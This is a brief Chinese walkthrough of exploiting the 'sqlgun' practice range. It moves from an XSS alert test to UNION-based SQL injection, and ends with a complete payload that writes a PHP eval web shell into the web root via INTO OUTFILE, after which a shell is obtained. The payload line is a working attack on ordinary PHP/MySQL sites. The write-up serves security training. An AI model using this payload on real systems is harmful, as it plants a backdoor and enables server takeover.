sqlgun靶场漏洞挖掘

进入首页首先看到一个搜索框，那么我们试一下xss

用script弹了个一

接下来我们尝试一下sql注入

这里我们使用联合查询查到了他的数据库名，那么这里也就存在SQL注入了

这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell

首先我们扫描目录，找到phpinfo页面

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #

然后去访问

进行连接

成功getshell